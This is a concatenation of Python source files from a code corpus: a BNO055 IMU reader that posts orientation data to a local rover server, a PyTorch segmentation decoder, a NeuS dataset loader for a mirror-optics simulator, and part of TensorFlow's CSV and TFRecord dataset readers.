# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import sys
import subprocess
import time
import requests
#from deepstream import get, post
from Adafruit_BNO055 import BNO055
global imuData
imuData = {}
'''
try:
obj = {}
post(obj, 'imu')
except:
print("Not connected to deepstream")
'''
magneticDeclination = 11.88
# Create and configure the BNO sensor connection. Make sure only ONE of the
# below 'bno = ...' lines is uncommented:
# Raspberry Pi configuration with serial UART and RST connected to GPIO 18:
#bno = BNO055.BNO055(serial_port='/dev/ttyAMA0', rst=18)
# BeagleBone Black configuration with default I2C connection (SCL=P9_19, SDA=P9_20),
# and RST connected to pin P9_12:
bno = BNO055.BNO055(busnum=0)
confMode = True
# Enable verbose debug logging if -v is passed as a parameter.
if len(sys.argv) == 2 and sys.argv[1].lower() == '-v':
logging.basicConfig(level=logging.DEBUG)
time.sleep(1)
# Initialize the BNO055 and stop if something went wrong.
while not bno.begin():
print('Waiting for sensor...')
time.sleep(1)
def magToTrue(h):
return (h + magneticDeclination) % 360
fileIn = open('calibrationData.txt','r')
data = fileIn.read().splitlines()
for i in range(len(data)):
data[i] = int(data[i])
bno.set_calibration(data)
fileIn.close()
# Print system status and self test result.
status, self_test, error = bno.get_system_status()
print('System status: {0}'.format(status))
print('Self test result (0x0F is normal): 0x{0:02X}'.format(self_test))
# Print out an error if system status is in error mode.
if status == 0x01:
print('System error: {0}'.format(error))
print('See datasheet section 4.3.59 for the meaning.')
# Print BNO055 software revision and other diagnostic data.
sw, bl, accel, mag, gyro = bno.get_revision()
print('Software version: {0}'.format(sw))
print('Bootloader version: {0}'.format(bl))
print('Accelerometer ID: 0x{0:02X}'.format(accel))
print('Magnetometer ID: 0x{0:02X}'.format(mag))
print('Gyroscope ID: 0x{0:02X}\n'.format(gyro))
print('Reading BNO055 data, press Ctrl-C to quit...')
try:
while True:
'''
if confMode == False and (sys != 3 or mag != 3):
print("Reloading calibration file...")
bno.set_calibration(data)
'''
# Read the Euler angles for heading, roll, pitch (all in degrees)
heading, roll, pitch = bno.read_euler()
# Read the calibration status, 0=uncalibrated and 3=fully calibrated
sys, gyro, accel, mag = bno.get_calibration_status()
heading = magToTrue(heading)
if sys == 3 and gyro == 3 and accel == 3 and mag == 3 and confMode:
bno.set_mode(0X0C)
confMode = False
print('Heading={0:0.2F} Roll={1:0.2F} Pitch={2:0.2F}\tSys_cal={3} Gyro_cal={4} Accel_cal={5} Mag_cal={6}'.format(
heading, roll, pitch, sys, gyro, accel, mag))
imuData = { "heading":heading, "roll":roll, "pitch":pitch, "sys":sys, "gyro":gyro, "accel":accel, "mag":mag }
payload = {"body":[{"topic": "record", "action":"write", "recordName": "rover/imu",
"data": imuData} ] }
print("Dumping to deepstream...")
try:
request = requests.post('http://192.168.1.2:4080', json=payload)
print(request.text)
except:
print("Rover Deepstream doesn't seem to be online")
# Other values you can optionally read:
# Orientation as a quaternion:
#x,y,z,w = bno.read_quaterion()
# Sensor temperature in degrees Celsius:
#temp_c = bno.read_temp()
# Magnetometer data (in micro-Teslas):
#x,y,z = bno.read_magnetometer()
# Gyroscope data (in degrees per second):
#x,y,z = bno.read_gyroscope()
# Accelerometer data (in meters per second squared):
#x,y,z = bno.read_accelerometer()
# Linear acceleration data (i.e. acceleration from movement, not gravity--
# returned in meters per second squared):
#x,y,z = bno.read_linear_acceleration()
# Gravity acceleration data (i.e. acceleration just from gravity--returned
# in meters per second squared):
#x,y,z = bno.read_gravity()
# Sleep for a second until the next reading.
time.sleep(0.02)
except:
print("Error")
| 37.904762 | 121 | 0.671034 |
7946575ca2e666179eddb6c5ca422d177b8a510d | 2,578 | py | Python | networks/decoder.py | Kinpzz/SANet-TMM | 46188e2f4b11727e8356b91b5e1e2453826e27fe | [
"MIT"
] | 6 | 2021-05-18T03:07:26.000Z | 2022-02-19T10:59:36.000Z | networks/decoder.py | Kinpzz/SANet-TMM | 46188e2f4b11727e8356b91b5e1e2453826e27fe | [
"MIT"
] | 2 | 2021-07-09T14:06:07.000Z | 2022-01-02T01:39:58.000Z | networks/decoder.py | Kinpzz/SANet-TMM | 46188e2f4b11727e8356b91b5e1e2453826e27fe | [
"MIT"
] | 1 | 2022-02-19T10:59:43.000Z | 2022-02-19T10:59:43.000Z | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
class Decoder(nn.Module):
def __init__(self, mix_size, low_level_inplanes, num_classes, BatchNorm):
super(Decoder, self).__init__()
self.conv1 = nn.Conv2d(low_level_inplanes, 48, 1, bias=False)
self.bn1 = BatchNorm(48)
self.last_conv = nn.Sequential(nn.Conv2d(48+mix_size, 256, kernel_size=3, stride=1, padding=1, bias=False),
BatchNorm(256),
nn.ReLU(),
nn.Dropout(0.5),
nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1, bias=False),
BatchNorm(256),
nn.ReLU(),
nn.Dropout(0.1),
nn.Conv2d(256, num_classes, kernel_size=1, stride=1))
self.theta = nn.Sequential(nn.Conv2d(256, 48, 1, bias=False),
BatchNorm(48))
self.psi = nn.Conv2d(48, 1, 1, bias=True)
self.W = nn.Sequential(nn.Conv2d(48, 48, 1, 1, 0, bias=False),
BatchNorm(48))
self._init_weight()
def attention_connection(self, low_level_feat, x):
theta_x = self.theta(x)
g = F.interpolate(low_level_feat, x.shape[2:], mode='bilinear', align_corners=True)
f = F.softplus(theta_x + g) # soft relu
att = torch.sigmoid(self.psi(f))
att = F.interpolate(att, low_level_feat.shape[2:], mode='bilinear', align_corners=True)
y = att.expand_as(low_level_feat) * low_level_feat
W_y = self.W(y)
return W_y, att
def forward(self, x, low_level_feat):
low_level_feat = self.conv1(low_level_feat)
low_level_feat = self.bn1(low_level_feat)
low_level_feat, att = self.attention_connection(low_level_feat, x)
x = F.interpolate(x, size=low_level_feat.size()[2:], mode='bilinear', align_corners=True)
x = torch.cat((x, low_level_feat), dim=1)
x = self.last_conv(x)
return x
def _init_weight(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
torch.nn.init.kaiming_normal_(m.weight, mode='fan_in', nonlinearity='relu')
if m.bias is not None:
torch.nn.init.zeros_(m.bias)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
| 44.448276 | 115 | 0.543445 |
7946578f4f3e9148f599bb3ed0a22efd2b42c002 | 12,673 | py | Python | models/dataset.py | magis-slac/NeuS | f3ef3c089b2076ea8d73679bf37a94ef44a08939 | [
"MIT"
] | null | null | null | models/dataset.py | magis-slac/NeuS | f3ef3c089b2076ea8d73679bf37a94ef44a08939 | [
"MIT"
] | null | null | null | models/dataset.py | magis-slac/NeuS | f3ef3c089b2076ea8d73679bf37a94ef44a08939 | [
"MIT"
] | null | null | null | import torch
import torch.nn.functional as F
import cv2 as cv
import numpy as np
import os
from glob import glob
from icecream import ic
from scipy.spatial.transform import Rotation as Rot
from scipy.spatial.transform import Slerp
import pickle
import diffoptics as optics
from diffoptics import Rays
import sys
# Path to your local clone of the magis simulator
SIMULATOR_PATH = '/sdf/home/s/sgaz/Magis-simulator'
sys.path.insert(0, SIMULATOR_PATH)
from magis.main_helpers import make_scene, get_sensor_index_positions, get_positions
from magis.mirror_utils import get_views_given_fixed_mirrors_smooth
class Dataset:
def __init__(self, conf):
super(Dataset, self).__init__()
print('Load data: Begin')
self.device = torch.device('cuda')
self.conf = conf
self.dset_name = conf['dset_path']
self.calib_name = conf['calib_path']
with open(self.dset_name,'rb') as f:
in_dataset = pickle.load(f)
#with open(calib_name, 'rb') as f:
# calib_dict = pickle.load(f)
self.H, self.W = in_dataset.shape[1:3]
self.image_pixels = self.H * self.W
in_dataset = in_dataset.reshape(in_dataset.shape[0], -1, 6)
assert in_dataset.shape == (in_dataset.shape[0], self.H*self.W, 1+1+1+3)
self.in_dataset = torch.from_numpy(in_dataset)
self.n_images = len(self.in_dataset)
#Let's try to put a MAGIS scene in here
# Get mirror parameters
m = conf['m']
f = conf['f']
xm,ym,zm,mirror_radii,angles,theta,phi,foc,obj = get_views_given_fixed_mirrors_smooth(
m = m,
f = f * 100,
fn = 1.23,
sv = 24/10,
sh = 24/10,
skipmirrs=5,
extreme_view_angle = np.radians(55),
window_pos = 3.0,
fixed_radii = [.25],
num_mirrors = [500])
#assert len(angles) == self.in_dataset.shape[0]
normals = torch.zeros((len(angles), 3))
for i in range(len(theta)):
normal_angles = angles
normal = optics.vector(np.cos(normal_angles[i]),
np.cos(theta[i]) * np.sin(normal_angles[i]),
np.sin(theta[i]) * np.sin(normal_angles[i]))
normals[i] = optics.normalize_vector(normal)
mirror_parameters = normals, torch.tensor(xm / 100, dtype=torch.float), torch.tensor(ym / 100, dtype=torch.float), torch.tensor(zm / 100, dtype=torch.float), torch.tensor(mirror_radii / 100, dtype=torch.float)
# @Todo check sensor parameters
pixel_size = conf['pixel_size']
self.scene = make_scene(object_x_pos=obj/100, f=f, m=m, na=1 / 1.4, nb_mirror=None, sensor_resolution=(conf['sensor_resolution_x'],conf['sensor_resolution_y']),
sensor_pixel_size=(pixel_size, pixel_size), poisson_noise_mean=2, quantum_efficiency=0.77,
mirror_parameters=mirror_parameters)
self.continuous_positions = get_positions(self.scene)
rad = conf['rad']
trans_mat = torch.eye(4)
trans_mat[0][3] = -obj/100* 1/rad
scale_mat = torch.eye(4)
scale_mat[0][0] = 1/rad
scale_mat[1][1] = 1/rad
scale_mat[2][2] = 1/rad
full_scale_mat = torch.matmul(trans_mat, scale_mat)[:-1]
self.full_scale_mat = full_scale_mat
object_bbox_min = np.array([-1.01, -1.01, -1.01, 1.0])
object_bbox_max = np.array([ 1.01, 1.01, 1.01, 1.0])
self.object_bbox_min = object_bbox_min[:, None][:3, 0]
self.object_bbox_max = object_bbox_max[:, None][:3, 0]
print('Load data: End')
def gen_rays_at(self, img_idx, resolution_level=1):
"""
Generate rays at world space from one camera.
"""
l = resolution_level
tx = torch.linspace(0, self.W - 1, self.W // l)
ty = torch.linspace(0, self.H - 1, self.H // l)
pixels_x, pixels_y = torch.meshgrid(tx, ty)
p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1) # W, H, 3
p = torch.matmul(self.intrinsics_all_inv[img_idx, None, None, :3, :3], p[:, :, :, None]).squeeze() # W, H, 3
rays_v = p / torch.linalg.norm(p, ord=2, dim=-1, keepdim=True) # W, H, 3
rays_v = torch.matmul(self.pose_all[img_idx, None, None, :3, :3], rays_v[:, :, :, None]).squeeze() # W, H, 3
rays_o = self.pose_all[img_idx, None, None, :3, 3].expand(rays_v.shape) # W, H, 3
return rays_o.transpose(0, 1), rays_v.transpose(0, 1)
def gen_random_rays_at(self, img_idx, batch_size):
"""
Generate random rays at world space from one camera.
"""
pixels_x = torch.randint(low=0, high=self.W, size=[batch_size])
pixels_y = torch.randint(low=0, high=self.H, size=[batch_size])
color = self.images[img_idx][(pixels_y, pixels_x)] # batch_size, 3
mask = self.masks[img_idx][(pixels_y, pixels_x)] # batch_size, 3
p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1).float() # batch_size, 3
p = torch.matmul(self.intrinsics_all_inv[img_idx, None, :3, :3], p[:, :, None]).squeeze() # batch_size, 3
rays_v = p / torch.linalg.norm(p, ord=2, dim=-1, keepdim=True) # batch_size, 3
rays_v = torch.matmul(self.pose_all[img_idx, None, :3, :3], rays_v[:, :, None]).squeeze() # batch_size, 3
rays_o = self.pose_all[img_idx, None, :3, 3].expand(rays_v.shape) # batch_size, 3
return torch.cat([rays_o.cpu(), rays_v.cpu(), color, mask[:, :1]], dim=-1).cuda() # batch_size, 10
def gen_rays_between(self, idx_0, idx_1, ratio, resolution_level=1):
"""
Interpolate pose between two cameras.
"""
l = resolution_level
tx = torch.linspace(0, self.W - 1, self.W // l)
ty = torch.linspace(0, self.H - 1, self.H // l)
pixels_x, pixels_y = torch.meshgrid(tx, ty)
p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1) # W, H, 3
p = torch.matmul(self.intrinsics_all_inv[0, None, None, :3, :3], p[:, :, :, None]).squeeze() # W, H, 3
rays_v = p / torch.linalg.norm(p, ord=2, dim=-1, keepdim=True) # W, H, 3
trans = self.pose_all[idx_0, :3, 3] * (1.0 - ratio) + self.pose_all[idx_1, :3, 3] * ratio
pose_0 = self.pose_all[idx_0].detach().cpu().numpy()
pose_1 = self.pose_all[idx_1].detach().cpu().numpy()
pose_0 = np.linalg.inv(pose_0)
pose_1 = np.linalg.inv(pose_1)
rot_0 = pose_0[:3, :3]
rot_1 = pose_1[:3, :3]
rots = Rot.from_matrix(np.stack([rot_0, rot_1]))
key_times = [0, 1]
slerp = Slerp(key_times, rots)
rot = slerp(ratio)
pose = np.diag([1.0, 1.0, 1.0, 1.0])
pose = pose.astype(np.float32)
pose[:3, :3] = rot.as_matrix()
pose[:3, 3] = ((1.0 - ratio) * pose_0 + ratio * pose_1)[:3, 3]
pose = np.linalg.inv(pose)
rot = torch.from_numpy(pose[:3, :3]).cuda()
trans = torch.from_numpy(pose[:3, 3]).cuda()
rays_v = torch.matmul(rot[None, None, :3, :3], rays_v[:, :, :, None]).squeeze() # W, H, 3
rays_o = trans[None, None, :3].expand(rays_v.shape) # W, H, 3
return rays_o.transpose(0, 1), rays_v.transpose(0, 1)
def near_far_from_sphere(self, rays_o, rays_d):
a = torch.sum(rays_d**2, dim=-1, keepdim=True)
b = 2.0 * torch.sum(rays_o * rays_d, dim=-1, keepdim=True)
mid = 0.5 * (-b) / a
near = mid - 1.0
far = mid + 1.0
return near, far
def image_at(self, idx, resolution_level):
#img = cv.imread(self.images_lis[idx])
img = self.in_dataset[idx, :, -3:].reshape((self.W,self.W, 3)).numpy()*256
return (cv.resize(img, (self.W // resolution_level, self.W // resolution_level))).clip(0, 255).astype(np.uint8)
#return (cv.resize(img, (self.W // resolution_level, self.H // resolution_level))).clip(0, 255)
def gen_rays_at_magis(self, lens, mirror, data_id, mirror_id):
"""
Generate rays at world space from one camera.
"""
ind = torch.arange(self.H*self.W)
# Sampling rays from the sensor to the lens
origins = torch.zeros(ind.shape[0], 3, device=self.device)
origins[:, 0] = self.continuous_positions[mirror_id][0]
origins[:, 1] = self.in_dataset[data_id, ind, 1]
origins[:, 2] = self.in_dataset[data_id, ind, 2]
points_on_lens = lens.sample_points_on_lens(ind.shape[0], device=self.device)
directions = optics.batch_vector(points_on_lens[:, 0] - origins[:, 0],
points_on_lens[:, 1]*0 - origins[:, 1],
points_on_lens[:, 2]*0 - origins[:, 2])
rays_sensor_to_lens = Rays(origins, directions, device=self.device,
meta = {'target' : self.in_dataset[data_id, ind, -3:].to(self.device),
'ind' : ind})
# Intersection with lens
t1 = lens.get_ray_intersection(rays_sensor_to_lens)
mask_t1 = ~torch.isnan(t1)
ray_lens_to_mirror = lens.intersect(rays_sensor_to_lens.get_at(mask_t1), t1[mask_t1])
# Intersection with mirror
t2 = mirror.get_ray_intersection(ray_lens_to_mirror)
mask = ~torch.isnan(t2)
assert mask.shape[0] == ind[mask_t1].shape[0]
#rays_mirror_to_object = mirror.intersect(ray_lens_to_mirror.get_at(mask), t2[mask])
rays_mirror_to_object = mirror.intersect(ray_lens_to_mirror, t2)
color = self.in_dataset[data_id, ind[mask_t1], -3:]
rays_mirror_to_object.origins = torch.matmul(self.full_scale_mat,
torch.cat((rays_mirror_to_object.origins, torch.ones((rays_mirror_to_object.origins.shape[0],1))), dim=1)[:, :, np.newaxis]).squeeze(dim=-1)
rays_mirror_to_object.directions = torch.matmul(self.full_scale_mat,
torch.cat((rays_mirror_to_object.directions, torch.zeros((rays_mirror_to_object.origins.shape[0],1))), dim=1)[:, :, np.newaxis]).squeeze(dim=-1)
rays_mirror_to_object.directions = rays_mirror_to_object.directions/torch.sqrt(torch.sum(rays_mirror_to_object.directions**2, dim=1, keepdim=True))
return rays_mirror_to_object, color.cuda()
def gen_random_rays_at_magis(self, lens, mirror, ind, data_id, mirror_id):
"""
Generate random rays at world space from one camera.
"""
# Sampling rays from the sensor to the lens
origins = torch.zeros(ind.shape[0], 3, device=self.device)
origins[:, 0] = self.continuous_positions[mirror_id][0]
origins[:, 1] = self.in_dataset[data_id, ind, 1]
origins[:, 2] = self.in_dataset[data_id, ind, 2]
points_on_lens = lens.sample_points_on_lens(ind.shape[0], device=self.device)
directions = optics.batch_vector(points_on_lens[:, 0] - origins[:, 0],
points_on_lens[:, 1]*0 - origins[:, 1],
points_on_lens[:, 2]*0 - origins[:, 2])
rays_sensor_to_lens = Rays(origins, directions, device=self.device,
meta = {'target' : self.in_dataset[data_id, ind, -3:].to(self.device),
'ind' : ind})
# Intersection with lens
t1 = lens.get_ray_intersection(rays_sensor_to_lens)
mask_t1 = ~torch.isnan(t1)
ray_lens_to_mirror = lens.intersect(rays_sensor_to_lens.get_at(mask_t1), t1[mask_t1])
# Intersection with mirror
t2 = mirror.get_ray_intersection(ray_lens_to_mirror)
mask = ~torch.isnan(t2)
assert mask.shape[0] == ind[mask_t1].shape[0]
rays_mirror_to_object = mirror.intersect(ray_lens_to_mirror.get_at(mask), t2[mask])
color = self.in_dataset[data_id, ind[mask_t1][mask], -3:]
rays_mirror_to_object.origins = torch.matmul(self.full_scale_mat,
torch.cat((rays_mirror_to_object.origins, torch.ones((rays_mirror_to_object.origins.shape[0],1))), dim=1)[:, :, np.newaxis]).squeeze(dim=-1)
rays_mirror_to_object.directions = torch.matmul(self.full_scale_mat,
torch.cat((rays_mirror_to_object.directions, torch.zeros((rays_mirror_to_object.origins.shape[0],1))), dim=1)[:, :, np.newaxis]).squeeze(dim=-1)
rays_mirror_to_object.directions = rays_mirror_to_object.directions/torch.sqrt(torch.sum(rays_mirror_to_object.directions**2, dim=1, keepdim=True))
return rays_mirror_to_object, color.cuda()
| 48.370229 | 217 | 0.609011 |
79465a0fd532b07e96285d1cf5897e63c44cfc9a | 41,198 | py | Python | tensorflow/python/data/experimental/ops/readers.py | nathanielchu/tensorflow | 92d160f610a6af39f644a265693cf16804ef78a9 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/data/experimental/ops/readers.py | nathanielchu/tensorflow | 92d160f610a6af39f644a265693cf16804ef78a9 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/data/experimental/ops/readers.py | nathanielchu/tensorflow | 92d160f610a6af39f644a265693cf16804ef78a9 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python wrappers for reader Datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import functools
import numpy as np
from tensorflow.python.data.experimental.ops import batching
from tensorflow.python.data.experimental.ops import error_ops
from tensorflow.python.data.experimental.ops import interleave_ops
from tensorflow.python.data.experimental.ops import parsing_ops
from tensorflow.python.data.experimental.ops import shuffle_ops
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import readers as core_readers
from tensorflow.python.data.util import convert
from tensorflow.python.data.util import nest
from tensorflow.python.data.util import structure
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import gen_experimental_dataset_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.platform import gfile
from tensorflow.python.util.tf_export import tf_export
_ACCEPTABLE_CSV_TYPES = (dtypes.float32, dtypes.float64, dtypes.int32,
dtypes.int64, dtypes.string)
def _is_valid_int32(str_val):
try:
# Checks equality to prevent int32 overflow
return dtypes.int32.as_numpy_dtype(str_val) == dtypes.int64.as_numpy_dtype(
str_val)
except (ValueError, OverflowError):
return False
def _is_valid_int64(str_val):
try:
dtypes.int64.as_numpy_dtype(str_val)
return True
except (ValueError, OverflowError):
return False
def _is_valid_float(str_val, float_dtype):
try:
return float_dtype.as_numpy_dtype(str_val) < np.inf
except ValueError:
return False
def _infer_type(str_val, na_value, prev_type):
"""Given a string, infers its tensor type.
Infers the type of a value by picking the least 'permissive' type possible,
while still allowing the previous type inference for this column to be valid.
Args:
str_val: String value to infer the type of.
na_value: Additional string to recognize as a NA/NaN CSV value.
prev_type: Type previously inferred based on values of this column that
we've seen up till now.
Returns:
Inferred dtype.
"""
if str_val in ("", na_value):
# If the field is null, it gives no extra information about its type
return prev_type
type_list = [
dtypes.int32, dtypes.int64, dtypes.float32, dtypes.float64, dtypes.string
] # list of types to try, ordered from least permissive to most
type_functions = [
_is_valid_int32,
_is_valid_int64,
lambda str_val: _is_valid_float(str_val, dtypes.float32),
lambda str_val: _is_valid_float(str_val, dtypes.float64),
lambda str_val: True,
] # Corresponding list of validation functions
for i in range(len(type_list)):
validation_fn = type_functions[i]
if validation_fn(str_val) and (prev_type is None or
prev_type in type_list[:i + 1]):
return type_list[i]
def _next_csv_row(filenames, num_cols, field_delim, use_quote_delim, header):
"""Generator that yields rows of CSV file(s) in order."""
for fn in filenames:
with file_io.FileIO(fn, "r") as f:
rdr = csv.reader(
f,
delimiter=field_delim,
quoting=csv.QUOTE_MINIMAL if use_quote_delim else csv.QUOTE_NONE)
if header:
next(rdr) # Skip header lines
for csv_row in rdr:
if len(csv_row) != num_cols:
raise ValueError(
"Problem inferring types: CSV row has different number of fields "
"than expected.")
yield csv_row
def _infer_column_defaults(filenames, num_cols, field_delim, use_quote_delim,
na_value, header, num_rows_for_inference,
select_columns):
"""Infers column types from the first N valid CSV records of files."""
if select_columns is None:
select_columns = range(num_cols)
inferred_types = [None] * len(select_columns)
for i, csv_row in enumerate(
_next_csv_row(filenames, num_cols, field_delim, use_quote_delim, header)):
if num_rows_for_inference is not None and i >= num_rows_for_inference:
break
for j, col_index in enumerate(select_columns):
inferred_types[j] = _infer_type(csv_row[col_index], na_value,
inferred_types[j])
# Replace None's with a default type
inferred_types = [t or dtypes.string for t in inferred_types]
# Default to 0 or '' for null values
return [
constant_op.constant([0 if t is not dtypes.string else ""], dtype=t)
for t in inferred_types
]
def _infer_column_names(filenames, field_delim, use_quote_delim):
"""Infers column names from first rows of files."""
csv_kwargs = {
"delimiter": field_delim,
"quoting": csv.QUOTE_MINIMAL if use_quote_delim else csv.QUOTE_NONE
}
with file_io.FileIO(filenames[0], "r") as f:
try:
column_names = next(csv.reader(f, **csv_kwargs))
except StopIteration:
raise ValueError(("Received StopIteration when reading the header line "
"of %s. Empty file?") % filenames[0])
for name in filenames[1:]:
with file_io.FileIO(name, "r") as f:
try:
if next(csv.reader(f, **csv_kwargs)) != column_names:
raise ValueError(
"Files have different column names in the header row.")
except StopIteration:
raise ValueError(("Received StopIteration when reading the header line "
"of %s. Empty file?") % filenames[0])
return column_names
def _get_sorted_col_indices(select_columns, column_names):
"""Transforms select_columns argument into sorted column indices."""
names_to_indices = {n: i for i, n in enumerate(column_names)}
num_cols = len(column_names)
for i, v in enumerate(select_columns):
if isinstance(v, int):
if v < 0 or v >= num_cols:
raise ValueError(
"Column index %d specified in select_columns out of valid range." %
v)
continue
if v not in names_to_indices:
raise ValueError(
"Value '%s' specified in select_columns not a valid column index or "
"name." % v)
select_columns[i] = names_to_indices[v]
# Sort and ensure there are no duplicates
result = sorted(set(select_columns))
if len(result) != len(select_columns):
raise ValueError("select_columns contains duplicate columns")
return result
def _maybe_shuffle_and_repeat(
dataset, num_epochs, shuffle, shuffle_buffer_size, shuffle_seed):
"""Optionally shuffle and repeat dataset, as requested."""
if num_epochs != 1 and shuffle:
# Use shuffle_and_repeat for perf
return dataset.apply(
shuffle_ops.shuffle_and_repeat(shuffle_buffer_size, num_epochs,
shuffle_seed))
elif shuffle:
return dataset.shuffle(shuffle_buffer_size, shuffle_seed)
elif num_epochs != 1:
return dataset.repeat(num_epochs)
return dataset
def make_tf_record_dataset(file_pattern,
batch_size,
parser_fn=None,
num_epochs=None,
shuffle=True,
shuffle_buffer_size=None,
shuffle_seed=None,
prefetch_buffer_size=dataset_ops.AUTOTUNE,
num_parallel_reads=None,
num_parallel_parser_calls=None,
drop_final_batch=False):
"""Reads and optionally parses TFRecord files into a dataset.
Provides common functionality such as batching, optional parsing, shuffling,
and performant defaults.
Args:
file_pattern: List of files or patterns of TFRecord file paths.
See `tf.io.gfile.glob` for pattern rules.
batch_size: An int representing the number of records to combine
in a single batch.
parser_fn: (Optional.) A function accepting string input to parse
and process the record contents. This function must map records
to components of a fixed shape, so they may be batched. By
default, uses the record contents unmodified.
num_epochs: (Optional.) An int specifying the number of times this
dataset is repeated. If None (the default), cycles through the
dataset forever.
shuffle: (Optional.) A bool that indicates whether the input
should be shuffled. Defaults to `True`.
shuffle_buffer_size: (Optional.) Buffer size to use for
shuffling. A large buffer size ensures better shuffling, but
increases memory usage and startup time.
shuffle_seed: (Optional.) Randomization seed to use for shuffling.
prefetch_buffer_size: (Optional.) An int specifying the number of
feature batches to prefetch for performance improvement.
Defaults to auto-tune. Set to 0 to disable prefetching.
num_parallel_reads: (Optional.) Number of threads used to read
records from files. By default or if set to a value >1, the
results will be interleaved.
num_parallel_parser_calls: (Optional.) Number of parallel
records to parse in parallel. Defaults to an automatic selection.
drop_final_batch: (Optional.) Whether the last batch should be
dropped in case its size is smaller than `batch_size`; the
default behavior is not to drop the smaller batch.
Returns:
A dataset, where each element matches the output of `parser_fn`
except it will have an additional leading `batch-size` dimension,
or a `batch_size`-length 1-D tensor of strings if `parser_fn` is
unspecified.
"""
files = dataset_ops.Dataset.list_files(
file_pattern, shuffle=shuffle, seed=shuffle_seed)
if num_parallel_reads is None:
# Note: We considered auto-tuning this value, but there is a concern
# that this affects the mixing of records from different files, which
# could affect training convergence/accuracy, so we are defaulting to
# a constant for now.
num_parallel_reads = 24
dataset = core_readers.TFRecordDataset(
files, num_parallel_reads=num_parallel_reads)
if shuffle_buffer_size is None:
# TODO(josh11b): Auto-tune this value when not specified
shuffle_buffer_size = 10000
dataset = _maybe_shuffle_and_repeat(
dataset, num_epochs, shuffle, shuffle_buffer_size, shuffle_seed)
# NOTE(mrry): We set `drop_final_batch=True` when `num_epochs is None` to
# improve the shape inference, because it makes the batch dimension static.
# It is safe to do this because in that case we are repeating the input
# indefinitely, and all batches will be full-sized.
drop_final_batch = drop_final_batch or num_epochs is None
if parser_fn is None:
dataset = dataset.batch(batch_size, drop_remainder=drop_final_batch)
else:
# TODO(josh11b): if num_parallel_parser_calls is None, use some function
# of num cores instead of map_and_batch's default behavior of one batch.
dataset = dataset.apply(batching.map_and_batch(
parser_fn, batch_size, num_parallel_calls=num_parallel_parser_calls,
drop_remainder=drop_final_batch))
if prefetch_buffer_size == 0:
return dataset
else:
return dataset.prefetch(buffer_size=prefetch_buffer_size)
@tf_export("data.experimental.make_csv_dataset", v1=[])
def make_csv_dataset_v2(
file_pattern,
batch_size,
column_names=None,
column_defaults=None,
label_name=None,
select_columns=None,
field_delim=",",
use_quote_delim=True,
na_value="",
header=True,
num_epochs=None,
shuffle=True,
shuffle_buffer_size=10000,
shuffle_seed=None,
prefetch_buffer_size=dataset_ops.AUTOTUNE,
num_parallel_reads=1,
sloppy=False,
num_rows_for_inference=100,
compression_type=None,
ignore_errors=False,
):
"""Reads CSV files into a dataset.
Reads CSV files into a dataset, where each element is a (features, labels)
tuple that corresponds to a batch of CSV rows. The features dictionary
maps feature column names to `Tensor`s containing the corresponding
feature data, and labels is a `Tensor` containing the batch's label data.
Args:
file_pattern: List of files or patterns of file paths containing CSV
records. See `tf.io.gfile.glob` for pattern rules.
batch_size: An int representing the number of records to combine
in a single batch.
column_names: An optional list of strings that corresponds to the CSV
columns, in order. One per column of the input record. If this is not
provided, infers the column names from the first row of the records.
These names will be the keys of the features dict of each dataset element.
column_defaults: A optional list of default values for the CSV fields. One
item per selected column of the input record. Each item in the list is
either a valid CSV dtype (float32, float64, int32, int64, or string), or a
`Tensor` with one of the aforementioned types. The tensor can either be
a scalar default value (if the column is optional), or an empty tensor (if
the column is required). If a dtype is provided instead of a tensor, the
column is also treated as required. If this list is not provided, tries
to infer types based on reading the first num_rows_for_inference rows of
files specified, and assumes all columns are optional, defaulting to `0`
for numeric values and `""` for string values. If both this and
`select_columns` are specified, these must have the same lengths, and
`column_defaults` is assumed to be sorted in order of increasing column
index.
label_name: A optional string corresponding to the label column. If
provided, the data for this column is returned as a separate `Tensor` from
the features dictionary, so that the dataset complies with the format
expected by a `tf.Estimator.train` or `tf.Estimator.evaluate` input
function.
select_columns: An optional list of integer indices or string column
names, that specifies a subset of columns of CSV data to select. If
column names are provided, these must correspond to names provided in
`column_names` or inferred from the file header lines. When this argument
is specified, only a subset of CSV columns will be parsed and returned,
corresponding to the columns specified. Using this results in faster
parsing and lower memory usage. If both this and `column_defaults` are
specified, these must have the same lengths, and `column_defaults` is
assumed to be sorted in order of increasing column index.
field_delim: An optional `string`. Defaults to `","`. Char delimiter to
separate fields in a record.
use_quote_delim: An optional bool. Defaults to `True`. If false, treats
double quotation marks as regular characters inside of the string fields.
na_value: Additional string to recognize as NA/NaN.
header: A bool that indicates whether the first rows of provided CSV files
